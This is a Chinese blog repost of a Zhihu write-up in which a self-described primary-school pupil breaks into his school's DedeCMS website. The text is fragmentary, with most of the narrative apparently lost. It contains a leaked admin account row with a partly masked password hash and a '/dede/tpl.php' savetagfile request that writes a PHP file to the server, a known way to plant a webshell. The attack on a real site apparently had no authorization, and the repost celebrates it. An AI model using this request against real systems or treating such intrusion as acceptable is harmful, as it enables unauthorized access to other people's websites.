實(shí)戰(zhàn) | 我把學(xué)校的網(wǎng)站搞了!
互聯(lián)網(wǎng)架構(gòu)師后臺回復(fù)?2T?有特別禮包
上一篇:杭州程序員從互聯(lián)網(wǎng)跳央企,曬一天工作和收入,網(wǎng)友:待一年就廢
今天這篇文章來源于知乎上一個叫R1et2Rttr的分享,作者自稱是一名六年級的小學(xué)生。文章主要記錄的是他針對自己學(xué)校網(wǎng)站的一次滲透測試,過程非常有趣,所以分享給各位讀者朋友。
一、信息收集



0day 指被發(fā)現(xiàn)但未被修復(fù)過的漏洞 1day 指被發(fā)現(xiàn)且被修復(fù),但是由于漏洞發(fā)現(xiàn)時間比較早,補(bǔ)丁普及不完整的漏洞 nday 指發(fā)現(xiàn)且被修復(fù)的漏洞,通用性較低,因?yàn)槁┒葱迯?fù)已經(jīng)較長時間,一般只有長期不更新的廠家才會中招** 于是,我開始了我的漏洞尋找之路。


二、漏洞利用

INSERT?INTO?`dede_member`?VALUES('1','xxxx','admin','2604ccf7b8a4a852cxxxxxxxx','admin','xxx','100','0','0','0','[email protected]','10000','10','0','','0','','xxxxxx','','xxxxxxx79','xxxxxxx','-1');


三、后滲透


域名?+?/dede/tpl.php?filename=moonsec.lib.php&action=savetagfile&content=&token=[Token值]

四、總結(jié)

正文結(jié)束
1.不認(rèn)命,從10年流水線工人,到谷歌上班的程序媛,一位湖南妹子的勵志故事
2.深圳一普通中學(xué)老師工資單曝光,秒殺程序員,網(wǎng)友:敢問是哪個學(xué)校畢業(yè)的?
3.從零開始搭建創(chuàng)業(yè)公司后臺技術(shù)棧

評論
圖片
表情
